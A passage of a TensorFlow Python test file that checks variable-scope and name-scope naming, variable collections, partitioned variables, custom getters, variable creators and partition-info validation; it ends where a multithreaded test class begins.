with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/default/scope2/")
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# AttributeError: 'variable_scope' object has no attribute
# '_graph_context_manager'
def testVarOpScopeReuseError(self):
with self.cached_session():
with self.assertRaises(ValueError):
with variable_scope.variable_scope(None, "default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/tower/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeOuterScope(self):
with self.cached_session():
with variable_scope.variable_scope("outer") as outer:
pass
with variable_scope.variable_scope(outer, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/default/scope2/")
with variable_scope.variable_scope(outer, "default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_2/scope2/")
outer.reuse_variables()
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_2/default/scope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeNestedOuterScope(self):
with self.cached_session():
with variable_scope.variable_scope("outer") as outer:
with variable_scope.variable_scope(outer, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/outer/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/default/scope2/")
with variable_scope.variable_scope(outer, "default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/default/scope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testBasicWhenAuxiliaryNameScopeIsFalse(self):
with self.cached_session():
with variable_scope.variable_scope(
"scope", auxiliary_name_scope=False) as scope:
self.assertEqual(scope.original_name_scope, "")
self.assertEqual(
variable_scope.get_variable("w", []).name, "scope/w:0")
self.assertEqual(constant_op.constant([], name="c").name, "c:0")
with variable_scope.variable_scope(scope, auxiliary_name_scope=False):
self.assertEqual(scope.original_name_scope, "")
self.assertEqual(
variable_scope.get_variable("w1", []).name, "scope/w1:0")
self.assertEqual(constant_op.constant([], name="c1").name, "c1:0")
# Recheck: new name scope is NOT created before
with ops.name_scope("scope"):
self.assertEqual(constant_op.constant([], name="c").name, "scope/c:0")
with variable_scope.variable_scope("outer"):
with variable_scope.variable_scope(
"inner", auxiliary_name_scope=False) as inner:
self.assertEqual(inner.original_name_scope, "outer/")
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/inner/w:0")
self.assertEqual(
constant_op.constant([], name="c").name, "outer/c:0")
with variable_scope.variable_scope(
inner, auxiliary_name_scope=False) as inner1:
self.assertEqual(inner1.original_name_scope, "outer/")
self.assertEqual(
variable_scope.get_variable("w1", []).name, "outer/inner/w1:0")
self.assertEqual(
constant_op.constant([], name="c1").name, "outer/c1:0")
# Recheck: new name scope is NOT created before
with ops.name_scope("inner"):
self.assertEqual(
constant_op.constant([], name="c").name, "outer/inner/c:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testCreatedByDefaultNameWhenAuxiliaryNameScopeIsFalse(self):
with self.cached_session():
with variable_scope.variable_scope(
None, default_name="default", auxiliary_name_scope=False) as scope:
self.assertEqual(scope.original_name_scope, "")
self.assertEqual(
variable_scope.get_variable("w", []).name, "default/w:0")
self.assertEqual(constant_op.constant([], name="c").name, "c:0")
# Recheck: new name scope is NOT created before
with ops.name_scope("default"):
self.assertEqual(
constant_op.constant([], name="c").name, "default/c:0")
with variable_scope.variable_scope("outer"):
with variable_scope.variable_scope(
None, default_name="default",
auxiliary_name_scope=False) as inner:
self.assertEqual(inner.original_name_scope, "outer/")
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
self.assertEqual(
constant_op.constant([], name="c").name, "outer/c:0")
# Recheck: new name scope is NOT created before
with ops.name_scope("default"):
self.assertEqual(
constant_op.constant([], name="c").name, "outer/default/c:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReenterRootScopeWhenAuxiliaryNameScopeIsFalse(self):
with self.cached_session():
root_scope = variable_scope.get_variable_scope()
with variable_scope.variable_scope(
root_scope, auxiliary_name_scope=False) as scope:
self.assertEqual(scope.original_name_scope, "")
self.assertEqual(variable_scope.get_variable("w", []).name, "w:0")
self.assertEqual(constant_op.constant([], name="c").name, "c:0")
with variable_scope.variable_scope("outer"):
with variable_scope.variable_scope(
root_scope, auxiliary_name_scope=False) as inner:
self.assertEqual(inner.original_name_scope, "")
self.assertEqual(variable_scope.get_variable("w1", []).name, "w1:0")
self.assertEqual(
constant_op.constant([], name="c1").name, "outer/c1:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testAuxiliaryNameScopeIsInvalid(self):
with self.cached_session():
with self.assertRaisesRegexp(TypeError, "auxiliary_name_scope"):
with variable_scope.variable_scope(
None, default_name="scope", auxiliary_name_scope="invalid"):
pass
with self.assertRaisesRegexp(TypeError, "auxiliary_name_scope"):
with variable_scope.variable_scope(
"scope", auxiliary_name_scope="invalid"):
pass
with variable_scope.variable_scope("scope") as scope:
pass
with self.assertRaisesRegexp(TypeError, "auxiliary_name_scope"):
with variable_scope.variable_scope(
scope, auxiliary_name_scope="invalid"):
pass
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReuseScopeWithoutNameScopeCollision(self):
    # GitHub issue: #13429
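    # Reusing a captured scope with auxiliary_name_scope=False and opening
    # scope.original_name_scope by hand keeps op names under the original
    # name scope instead of creating a colliding (suffixed) one.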
with self.cached_session():
with variable_scope.variable_scope("outer"):
with variable_scope.variable_scope("inner") as inner:
pass
with variable_scope.variable_scope(
inner, auxiliary_name_scope=False) as scope:
with ops.name_scope(scope.original_name_scope):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/inner/w:0")
self.assertEqual(
constant_op.constant([], name="c").name, "outer/inner/c:0")
with ops.name_scope("inner"):
self.assertEqual(
constant_op.constant([], name="c").name, "inner/c:0")
with variable_scope.variable_scope("another"):
with variable_scope.variable_scope(
inner, auxiliary_name_scope=False) as scope1:
with ops.name_scope(scope1.original_name_scope):
self.assertEqual(
variable_scope.get_variable("w1", []).name,
"outer/inner/w1:0")
self.assertEqual(
constant_op.constant([], name="c1").name, "outer/inner/c1:0")
with ops.name_scope("inner"):
self.assertEqual(
constant_op.constant([], name="c").name, "another/inner/c:0")
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
# (different assertions failing after wrapping, in both execution modes)
@test_util.run_in_graph_and_eager_modes
def testGetLocalVar(self):
# Check that local variable respects naming.
with variable_scope.variable_scope("outer") as outer:
with variable_scope.variable_scope(outer, "default", []):
local_var = variable_scope.get_local_variable(
"w", [], collections=["foo"])
self.assertEqual(local_var.name, "outer/w:0")
if not context.executing_eagerly():
# Since variable is local, it should be in the local variable collection
# but not the trainable collection.
self.assertIn(local_var,
ops.get_collection(ops.GraphKeys.LOCAL_VARIABLES))
self.assertIn(local_var, ops.get_collection("foo"))
self.assertNotIn(local_var,
ops.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES))
# Check that local variable respects `reuse`.
with variable_scope.variable_scope(outer, "default", reuse=True):
self.assertEqual(
variable_scope.get_local_variable("w", []).name, "outer/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testSignatureGetVarVsGetLocalVar(self):
"""get_{local,}variable() must take the same list of args."""
arg_names = tf_inspect.getargspec(variable_scope.get_variable)[0]
local_arg_names = tf_inspect.getargspec(
variable_scope.get_local_variable)[0]
self.assertEqual(arg_names, local_arg_names)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVarWithDevice(self):
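    # A device function sees every op; this one records the name and dtype of
    # variable ops while deciding their placement.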
g = ops.Graph()
varname_type = []
def device_func(op):
if op.type in ["Variable", "VariableV2", "VarHandleOp"]:
varname_type.append((op.name, op.get_attr("dtype")))
return "/device:GPU:0"
with g.as_default():
with ops.device(device_func):
_ = variable_scope.get_variable("x", (100, 200))
_ = variable_scope.get_variable(
"y", dtype=dtypes.int64, initializer=numpy.arange(73))
self.assertEqual(varname_type[0], ("x", dtypes.float32))
self.assertEqual(varname_type[1], ("y", dtypes.int64))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
def testGetCollection(self):
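    # scope.get_collection(key) returns only the collection entries created
    # under that scope's name prefix, unlike the graph-wide collection.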
with self.cached_session():
_ = variable_scope.get_variable("testGetCollection_a", [])
_ = variable_scope.get_variable(
"testGetCollection_b", [], trainable=False)
with variable_scope.variable_scope("testGetCollection_foo_") as scope1:
_ = variable_scope.get_variable("testGetCollection_a", [])
_ = variable_scope.get_variable(
"testGetCollection_b", [], trainable=False)
self.assertEqual([
v.name
for v in scope1.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
], ["testGetCollection_foo_/testGetCollection_a:0"])
self.assertEqual([
v.name
for v in scope1.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
], [
"testGetCollection_foo_/testGetCollection_a:0",
"testGetCollection_foo_/testGetCollection_b:0"
])
with variable_scope.variable_scope("testGetCollection_foo") as scope2:
_ = variable_scope.get_variable("testGetCollection_a", [])
_ = variable_scope.get_variable(
"testGetCollection_b", [], trainable=False)
self.assertEqual([
v.name
for v in scope2.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
], ["testGetCollection_foo/testGetCollection_a:0"])
self.assertEqual([
v.name
for v in scope2.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
], [
"testGetCollection_foo/testGetCollection_a:0",
"testGetCollection_foo/testGetCollection_b:0"
])
scope = variable_scope.get_variable_scope()
self.assertEqual([
v.name for v in scope.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
], [
"testGetCollection_a:0", "testGetCollection_b:0",
"testGetCollection_foo_/testGetCollection_a:0",
"testGetCollection_foo_/testGetCollection_b:0",
"testGetCollection_foo/testGetCollection_a:0",
"testGetCollection_foo/testGetCollection_b:0"
])
self.assertEqual([
v.name
for v in scope.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
], [
"testGetCollection_a:0",
"testGetCollection_foo_/testGetCollection_a:0",
"testGetCollection_foo/testGetCollection_a:0"
])
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
def testGetTrainableVariablesWithGetVariable(self):
with self.cached_session():
_ = variable_scope.get_variable("testGetTrainableVariables_a", [])
with variable_scope.variable_scope(
"testGetTrainableVariables_foo") as scope:
_ = variable_scope.get_variable("testGetTrainableVariables_b", [])
_ = variable_scope.get_variable(
"testGetTrainableVariables_c", [], trainable=False)
# sync `ON_READ` sets trainable=False
_ = variable_scope.get_variable(
"testGetTrainableVariables_d", [],
synchronization=variable_scope.VariableSynchronization.ON_READ)
self.assertEqual(
[v.name for v in scope.trainable_variables()],
["testGetTrainableVariables_foo/testGetTrainableVariables_b:0"])
        # All other synchronization values set trainable=True.
_ = variable_scope.get_variable(
"testGetTrainableVariables_e", [],
synchronization=variable_scope.VariableSynchronization.ON_WRITE)
self.assertEqual([v.name for v in scope.trainable_variables()], [
"testGetTrainableVariables_foo/testGetTrainableVariables_b:0",
"testGetTrainableVariables_foo/testGetTrainableVariables_e:0"
])
with self.assertRaisesRegexp(
ValueError, "Synchronization value can be set to "
"VariableSynchronization.ON_READ only for non-trainable variables. "
"You have specified trainable=True and "
"synchronization=VariableSynchronization.ON_READ."):
_ = variable_scope.get_variable(
"testGetTrainableVariables_e", [],
synchronization=variable_scope.VariableSynchronization.ON_READ,
trainable=True)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
def testGetTrainableVariablesWithVariable(self):
with self.cached_session():
_ = variable_scope.variable(1.0, name="testGetTrainableVariables_a")
with variable_scope.variable_scope(
"testGetTrainableVariables_foo") as scope:
_ = variable_scope.variable(1.0, name="testGetTrainableVariables_b")
_ = variable_scope.variable(
1.0, name="testGetTrainableVariables_c", trainable=False)
# sync `ON_READ` sets trainable=False
_ = variable_scope.variable(
1.0,
name="testGetTrainableVariables_d",
synchronization=variable_scope.VariableSynchronization.ON_READ)
self.assertEqual(
[v.name for v in scope.trainable_variables()],
["testGetTrainableVariables_foo/testGetTrainableVariables_b:0"])
        # All other synchronization values set trainable=True.
_ = variable_scope.variable(
1.0,
name="testGetTrainableVariables_e",
synchronization=variable_scope.VariableSynchronization.ON_WRITE)
self.assertEqual([v.name for v in scope.trainable_variables()], [
"testGetTrainableVariables_foo/testGetTrainableVariables_b:0",
"testGetTrainableVariables_foo/testGetTrainableVariables_e:0"
])
with self.assertRaisesRegexp(
ValueError, "Synchronization value can be set to "
"VariableSynchronization.ON_READ only for non-trainable variables. "
"You have specified trainable=True and "
"synchronization=VariableSynchronization.ON_READ."):
_ = variable_scope.variable(
1.0,
name="testGetTrainableVariables_e",
synchronization=variable_scope.VariableSynchronization.ON_READ,
trainable=True)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
def testGetGlobalVariables(self):
with self.cached_session():
_ = variable_scope.get_variable("testGetGlobalVariables_a", [])
with variable_scope.variable_scope("testGetGlobalVariables_foo") as scope:
_ = variable_scope.get_variable("testGetGlobalVariables_b", [])
self.assertEqual(
[v.name for v in scope.global_variables()],
["testGetGlobalVariables_foo/"
"testGetGlobalVariables_b:0"])
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
def testGetLocalVariables(self):
with self.cached_session():
_ = variable_scope.get_variable(
"a", [], collections=[ops.GraphKeys.LOCAL_VARIABLES])
with variable_scope.variable_scope("foo") as scope:
_ = variable_scope.get_variable(
"b", [], collections=[ops.GraphKeys.LOCAL_VARIABLES])
_ = variable_scope.get_variable("c", [])
self.assertEqual([v.name for v in scope.local_variables()], ["foo/b:0"])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVariableWithRefDtype(self):
v = variable_scope.get_variable("v", shape=[3, 4], dtype=dtypes.float32)
# Ensure it is possible to do get_variable with a _ref dtype passed in.
_ = variable_scope.get_variable("w", shape=[5, 6], dtype=v.dtype)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testTwoGraphs(self):
def f():
g1 = ops.Graph()
g2 = ops.Graph()
with g1.as_default():
with g2.as_default():
with variable_scope.variable_scope("_"):
pass
self.assertRaisesRegexp(ValueError, "'_' is not a valid scope name", f)
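

# Partitioners used by the partitioning tests below: each returns a
# per-dimension split count for the requested shape; axis0_intoN asks for N
# parts along the first axis (axis0_into1 leaves the variable unpartitioned).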
def axis0_into1_partitioner(shape=None, **unused_kwargs):
part = [1] * len(shape)
return part


def axis0_into2_partitioner(shape=None, **unused_kwargs):
part = [1] * len(shape)
part[0] = 2
return part


def axis0_into3_partitioner(shape=None, **unused_kwargs):
part = [1] * len(shape)
part[0] = 3
return part


class VariableScopeWithPartitioningTest(test.TestCase):
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
def testResultNameMatchesRequested(self):
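    # With a partitioner, get_variable returns a PartitionedVariable whose name
    # matches the requested one, while the underlying shards are registered in
    # the collections as name0/part_<i>.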
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner):
v = variable_scope.get_variable("name0", shape=(3, 1, 1))
self.assertEqual(v.name, "scope0/name0")
v_concat = v.as_tensor()
self.assertEqual(v_concat.name, "scope0/name0:0")
variables = ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
self.assertIn("scope0/name0/part_0:0", [x.name for x in variables])
self.assertIn("scope0/name0/part_1:0", [x.name for x in variables])
self.assertNotIn("scope0/name0/part_2:0", [x.name for x in variables])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testBreaksIfPartitioningChanges(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner):
variable_scope.get_variable("name0", shape=(3, 1, 1))
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into3_partitioner, reuse=True):
with self.assertRaisesRegexp(
ValueError,
"Trying to reuse partitioned variable .* but specified partitions "
".* and found partitions .*"):
variable_scope.get_variable("name0", shape=(3, 1, 1))
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into1_partitioner, reuse=True):
with self.assertRaisesRegexp(
ValueError,
"Trying to reuse partitioned variable .* but specified partitions "
".* and found partitions .*"):
variable_scope.get_variable("name0", shape=(3, 1, 1))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReturnsExistingConcatenatedValueIfReuse(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner):
v_concat = variable_scope.get_variable("name0", shape=(3, 1, 1))
variable_scope.get_variable_scope().reuse_variables()
v_concat_2 = variable_scope.get_variable("name0", shape=(3, 1, 1))
self.assertEqual(v_concat, v_concat_2)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testAllowsReuseWithoutPartitioner(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner):
v = variable_scope.get_variable("name0", shape=(3, 1, 1))
with variable_scope.variable_scope("scope0", reuse=True):
v_reused = variable_scope.get_variable("name0")
self.assertEqual(v, v_reused)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testPropagatePartitionerOnReopening(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner) as vs:
self.assertEqual(axis0_into2_partitioner, vs.partitioner)
with variable_scope.variable_scope(vs) as vs1:
self.assertEqual(axis0_into2_partitioner, vs1.partitioner)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
def testScalarIgnoresPartitioner(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner):
v = variable_scope.get_variable("name0", shape=())
self.assertEqual(v.name, "scope0/name0:0")
variables = ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
self.assertIn("scope0/name0:0", [x.name for x in variables])
def _testPartitionConcatenatesAlongCorrectAxis(self, use_resource):
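    # Each partitioner below splits a (2, 2, 2) variable into two shards along
    # a different axis; the partitioned variable still reports the full shape.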
def _part_axis_0(**unused_kwargs):
return (2, 1, 1)
def _part_axis_1(**unused_kwargs):
return (1, 2, 1)
with variable_scope.variable_scope("root", use_resource=use_resource):
v0 = variable_scope.get_variable(
"n0", shape=(2, 2, 2), partitioner=_part_axis_0)
v1 = variable_scope.get_variable(
"n1", shape=(2, 2, 2), partitioner=_part_axis_1)
self.assertEqual(v0.get_shape(), (2, 2, 2))
self.assertEqual(v1.get_shape(), (2, 2, 2))
n0_0 = list(v0)[0]
n0_1 = list(v0)[1]
self.assertEqual(n0_0.get_shape(), (1, 2, 2))
self.assertEqual(n0_1.get_shape(), (1, 2, 2))
n1_0 = list(v1)[0]
n1_1 = list(v1)[1]
self.assertEqual(n1_0.get_shape(), (2, 1, 2))
self.assertEqual(n1_1.get_shape(), (2, 1, 2))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testPartitionConcatenatesAlongCorrectAxis(self):
self._testPartitionConcatenatesAlongCorrectAxis(use_resource=False)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testPartitionConcatenatesAlongCorrectAxisResource(self):
self._testPartitionConcatenatesAlongCorrectAxis(use_resource=True)


class VariableScopeWithCustomGetterTest(test.TestCase):
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNonCallableGetterFails(self):
with self.assertRaisesRegexp(ValueError,
r"custom_getter .* not callable:"):
with variable_scope.variable_scope("scope0", custom_getter=3):
variable_scope.get_variable("name0")
with self.assertRaisesRegexp(ValueError,
r"custom_getter .* not callable:"):
variable_scope.get_variable("name0", custom_getter=3)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNoSideEffectsWithIdentityCustomGetter(self):
called = [0]
def custom_getter(getter, *args, **kwargs):
called[0] += 1
return getter(*args, **kwargs)
with variable_scope.variable_scope(
"scope", custom_getter=custom_getter) as scope:
v = variable_scope.get_variable("v", [1])
with variable_scope.variable_scope(scope, reuse=True):
v2 = variable_scope.get_variable("v", [1])
with variable_scope.variable_scope("new_scope") as new_scope:
v3 = variable_scope.get_variable("v3", [1])
with variable_scope.variable_scope(
new_scope, reuse=True, custom_getter=custom_getter):
v4 = variable_scope.get_variable("v3", [1])
self.assertEqual(v, v2)
self.assertEqual(v3, v4)
self.assertEqual(3, called[0]) # skipped one in the first new_scope
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testSynchronizationAndAggregationWithCustomGetter(self):
called = [0]
synchronization = variable_scope.VariableSynchronization.AUTO
aggregation = variable_scope.VariableAggregation.NONE
def custom_getter(getter, *args, **kwargs):
called[0] += 1
# Verify synchronization and aggregation kwargs are as expected.
self.assertEqual(kwargs["synchronization"], synchronization)
self.assertEqual(kwargs["aggregation"], aggregation)
return getter(*args, **kwargs)
with variable_scope.variable_scope("scope", custom_getter=custom_getter):
variable_scope.get_variable("v", [1])
self.assertEqual(1, called[0])
with variable_scope.variable_scope("scope", custom_getter=custom_getter):
synchronization = variable_scope.VariableSynchronization.ON_READ
aggregation = variable_scope.VariableAggregation.MEAN
variable_scope.get_variable(
"v1", [1], synchronization=synchronization, aggregation=aggregation)
self.assertEqual(2, called[0])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testCustomGetterWithReuse(self):
# Custom getter can choose to behave differently on reused variables.
def custom_getter(getter, *args, **kwargs):
var = getter(*args, **kwargs)
if kwargs["reuse"]:
# This can be used, e.g., for changing the caching device if needed.
return array_ops.identity(var, name="reused")
else:
return array_ops.identity(var, name="not_reused")
with variable_scope.variable_scope(
"scope", custom_getter=custom_getter) as scope:
v = variable_scope.get_variable("v", [1])
with variable_scope.variable_scope(scope, reuse=True):
v2 = variable_scope.get_variable("v", [1])
self.assertEqual(v.name, "not_reused:0")
self.assertEqual(v2.name, "reused:0")
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# ValueError: Fetch argument <tf.Tensor 'custom_getter/add:0' shape=(1, 2, 3)
# dtype=float32> cannot be interpreted as a Tensor. (Tensor
# Tensor("custom_getter/add:0", shape=(1, 2, 3), dtype=float32) is not an
# element of this graph.)
def testGetterThatCreatesTwoVariablesAndSumsThem(self):
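    # A custom getter may return an arbitrary tensor: this one creates two
    # underlying variables per request and returns their sum.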
def custom_getter(getter, name, *args, **kwargs):
g_0 = getter("%s/0" % name, *args, **kwargs)
g_1 = getter("%s/1" % name, *args, **kwargs)
with ops.name_scope("custom_getter"):
return g_0 + g_1
with variable_scope.variable_scope("scope", custom_getter=custom_getter):
v = variable_scope.get_variable("v", [1, 2, 3])
self.assertEqual([1, 2, 3], v.get_shape())
true_vars = variables_lib.trainable_variables()
self.assertEqual(2, len(true_vars))
self.assertEqual("scope/v/0:0", true_vars[0].name)
self.assertEqual("scope/v/1:0", true_vars[1].name)
self.assertEqual("custom_getter/add:0", v.name)
with self.cached_session() as sess:
variables_lib.global_variables_initializer().run()
np_vars, np_v = sess.run([true_vars, v])
self.assertAllClose(np_v, sum(np_vars))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# ValueError: Fetch argument <tf.Tensor 'sum_getter_2/add:0' shape=(1, 2, 3)
# dtype=float32> cannot be interpreted as a Tensor. (Tensor
# Tensor("sum_getter_2/add:0", shape=(1, 2, 3), dtype=float32) is not an
# element of this graph.)
def testNestedCustomGetters(self):
def sum_getter(getter, name, *args, **kwargs):
g_0 = getter("%s/sum_0" % name, *args, **kwargs)
g_1 = getter("%s/sum_1" % name, *args, **kwargs)
with ops.name_scope("sum_getter"):
return g_0 + g_1
def prod_getter(getter, name, *args, **kwargs):
g_0 = getter("%s/prod_0" % name, *args, **kwargs)
g_1 = getter("%s/prod_1" % name, *args, **kwargs)
with ops.name_scope("prod_getter"):
return g_0 * g_1
with variable_scope.variable_scope("prod_scope", custom_getter=prod_getter):
with variable_scope.variable_scope("sum_scope", custom_getter=sum_getter):
with variable_scope.variable_scope(
"inner_sum_scope", custom_getter=sum_getter):
# take sums of sums of products
v = variable_scope.get_variable("v", [1, 2, 3])
self.assertEqual([1, 2, 3], v.get_shape())
true_vars = variables_lib.trainable_variables()
self.assertEqual(8, len(true_vars))
template = (
"prod_scope/sum_scope/inner_sum_scope/v/sum_%d/sum_%d/prod_%d:0")
self.assertEqual(template % (0, 0, 0), true_vars[0].name)
self.assertEqual(template % (0, 0, 1), true_vars[1].name)
self.assertEqual(template % (0, 1, 0), true_vars[2].name)
self.assertEqual(template % (0, 1, 1), true_vars[3].name)
self.assertEqual(template % (1, 0, 0), true_vars[4].name)
self.assertEqual(template % (1, 0, 1), true_vars[5].name)
self.assertEqual(template % (1, 1, 0), true_vars[6].name)
self.assertEqual(template % (1, 1, 1), true_vars[7].name)
with self.cached_session() as sess:
variables_lib.global_variables_initializer().run()
np_vars, np_v = sess.run([true_vars, v])
      # The value is a sum of sums of products of the eight underlying
      # variables.
self.assertAllClose(
np_v, (((np_vars[0] * np_vars[1]) + (np_vars[2] * np_vars[3])) + (
(np_vars[4] * np_vars[5]) + (np_vars[6] * np_vars[7]))))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVariableCreator(self):
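    # Variable creator scopes nest: the innermost creator runs first and may
    # rewrite kwargs (here the name) before outer creators and the default
    # creator see them.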
variable_names = []
def creator_a(next_creator, **kwargs):
variable_names.append(kwargs.get("name", ""))
return next_creator(**kwargs)
def creator_b(next_creator, **kwargs):
kwargs["name"] = "forced_name"
return next_creator(**kwargs)
with variable_scope.variable_creator_scope(creator_a):
with variable_scope.variable_creator_scope(creator_b):
variable_scope.variable(1.0, name="one_name")
self.assertAllEqual(variable_names, ["forced_name"])
called = [False]
def creater_c(next_creator, **kwargs):
called[0] = True
self.assertEqual(kwargs["synchronization"],
variable_scope.VariableSynchronization.ON_WRITE)
self.assertEqual(kwargs["aggregation"],
variable_scope.VariableAggregation.MEAN)
return next_creator(**kwargs)
with variable_scope.variable_creator_scope(creater_c):
variable_scope.get_variable(
"v", [],
synchronization=variable_scope.VariableSynchronization.ON_WRITE,
aggregation=variable_scope.VariableAggregation.MEAN)
self.assertTrue(called[0])


class PartitionInfoTest(test.TestCase):
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testConstructorChecks(self):
# Invalid arg types.
with self.assertRaises(TypeError):
variable_scope._PartitionInfo(full_shape=None, var_offset=[0, 1])
with self.assertRaises(TypeError):
variable_scope._PartitionInfo(full_shape=[0, 1], var_offset=None)
with self.assertRaises(TypeError):
variable_scope._PartitionInfo(full_shape="foo", var_offset=[0, 1])
with self.assertRaises(TypeError):
variable_scope._PartitionInfo(full_shape=[0, 1], var_offset="foo")
# full_shape and var_offset must have same length.
with self.assertRaises(ValueError):
variable_scope._PartitionInfo(full_shape=[0, 1], var_offset=[0])
# Offset must always be less than shape.
with self.assertRaises(ValueError):
variable_scope._PartitionInfo(full_shape=[1, 1], var_offset=[0, 1])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testSingleOffset(self):
partition_info = variable_scope._PartitionInfo(
full_shape=[9, 3], var_offset=[4, 0])
self.assertEqual(4, partition_info.single_offset([1, 3]))
# Tests when the variable isn't partitioned at all.
partition_info = variable_scope._PartitionInfo(
full_shape=[9, 3], var_offset=[0, 0])
self.assertEqual(0, partition_info.single_offset([9, 3]))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testSingleSliceDim(self):
partition_info = variable_scope._PartitionInfo(
full_shape=[9, 3], var_offset=[4, 0])
# Invalid shape.
with self.assertRaises(TypeError):
partition_info.single_slice_dim(None)
# Rank of shape differs from full_shape.
with self.assertRaises(ValueError):
partition_info.single_slice_dim([1, 2, 3])
# Shape is too large given var_offset (4+6 > 9).
with self.assertRaises(ValueError):
partition_info.single_slice_dim([6, 3])
# Multiple possible slice dim from shape.
with self.assertRaises(ValueError):
partition_info.single_slice_dim([1, 1])
partition_info = variable_scope._PartitionInfo(
full_shape=[9, 3], var_offset=[0, 0])
self.assertEqual(1, partition_info.single_slice_dim([9, 2]))
partition_info = variable_scope._PartitionInfo(
full_shape=[9, 3], var_offset=[4, 0])
self.assertEqual(0, partition_info.single_slice_dim([2, 3]))


class VariableScopeMultithreadedTest(test.TestCase):
@test_util.run_in_graph_and_eager_modes
